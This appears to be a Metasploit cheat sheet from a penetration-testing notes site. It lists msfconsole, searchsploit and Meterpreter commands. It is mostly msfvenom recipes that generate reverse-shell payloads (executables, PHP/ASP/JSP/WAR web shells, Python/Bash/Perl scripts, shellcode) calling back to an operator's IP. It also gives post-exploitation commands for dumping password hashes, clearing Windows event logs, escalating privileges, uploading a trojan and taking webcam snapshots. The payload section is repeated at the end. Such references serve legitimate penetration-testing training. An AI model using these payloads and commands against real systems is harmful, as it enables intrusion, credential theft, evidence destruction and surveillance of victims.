Metasploit Cheatsheet

Resources

Metasploit Unleashed | Metasploit Unleashed - Free Online Ethical Hacking Coursewww.offensive-security.com

Searchsploit

searchsploit <search>
searchsploit -x <file.txt>

Msfconsole

msfconsole -h #usage options
msf > help
msf > <command> -h
msf > help search

connect <ip> <port> #netcat like

edit #edit the current module

grep <http> search <oracle> #match output containing the string “http” from a search for modules containing the string “oracle”

info

load <plugin> #load plugin
unload <plugin> #unload plugin

route <add/remove> <subnet> <netmask> <session_id> #allows you to route sockets through a session or ‘comm’, providing basic pivoting capabilities
route flush #remove all routes
route print #show all active routes

search name:mysql
search type:post
search cve:2011 author:jduck platform:linux

background
sessions -l #list sessions
sessions -i 1 #interact with session 1

set <rhost> <ip> #configure options for the current module
unset <rhost> #remove a parameter
unset all # remove all parameters

setg <rhost> <ip> #set global variables
unsetg #unset global variables
save #after setting your different variables, you can run the save command to save your current environment and settings

show <auxiliary/exploits/...>
show options
show advanced #more options
show payloads
show targets
show encoders #useful in exploit development when you aren’t quite certain as to which payload encoding methods will work with a given exploit.
show nops #display nop generators
show evasion

use <module/module_id>

back
banner
check #see if the target is vulnerable, not often support
color
exit
irb #drop into a live Ruby interpreter shell
jobs #Jobs are modules that are running in the background. The jobs command provides the ability to list and terminate these jobs.
kill <0> #kill job 0
loadpath #load a third-part module tree for the path so you can point Metasploit at your 0-day exploits, encoders, payloads, etc.
resource <karma.rc> #runs resource (batch) files that can be loaded through msfconsole.

exploit -j # run in the background

Msfvenom

### List payloads ###

msfvenom -l

### Binaries ###

## Linux ##

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

## Windows ##

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

## Mac ##

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

### Web Payloads ###

## PHP ##
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

## ASP ##

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

## ASPX ##

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx

## JSP ##

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

## WAR ##

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

### Scripting Payloads ###

## Python ##

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

## Bash ##

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

## Perl ##

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

### Shellcode ###

#For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

## Linux Based Shellcode ##

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

## Windows Based Shellcode ##

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

## Mac Based Shellcode ##

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Handler

use exploit/multi/handler

Shell to meterpreter

post/multi/manage/shell_to_meterpreter

Meterpreter

help
background
clearev #clear the application, system and security logs on windows system
download <c:\\boot.ini> #use double-slashes
edit <file.txt> #use vim
execute -f <cmd.exe> -i -H #runs a command on the target
getuid #display the user running on the host
hashdump #dump SAM database
idletime #display time that the user at the remote machine has been idle
ipconfig
lpwd & lcd #change apply in local, not on the remote host
sysinfo
getsystem #to try priviledges escalation
ps
migrate <1832> #change current ps to ps 1832 to escalade (run post/windows/manage/migrate)
resource <resource.txt> #call a file with meterpreter instructions
search -f <autoexec.bat> #locate specific file
search -f <sea*.bat> <c:\\xamp\\>
shell #standard shell on the target system
upload <trojan.exe> <c:\\windows\\sytem32> #use double-slashes
webcam_list
webcam_snap
load <python/kiwi/...>
creds_all

PreviousVIM basics NextCommon ports & protocols

Last updated 5 years ago

### List payloads ### msfvenom -l ### Binaries ### ## Linux ## msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf ## Windows ## msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe ## Mac ## msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho ### Web Payloads ### ## PHP ## msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php ## ASP ## msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp ## ASPX ## msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx ## JSP ## msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp ## WAR ## msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war ### Scripting Payloads ### ## Python ## msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py ## Bash ## msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh ## Perl ## msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl ### Shellcode ### #For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits. ## Linux Based Shellcode ## msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language> ## Windows Based Shellcode ## msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language> ## Mac Based Shellcode ## msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

hashtagResources

hashtagSearchsploit

hashtagMsfconsole

hashtagMsfvenom

hashtagHandler

hashtagShell to meterpreter

hashtagMeterpreter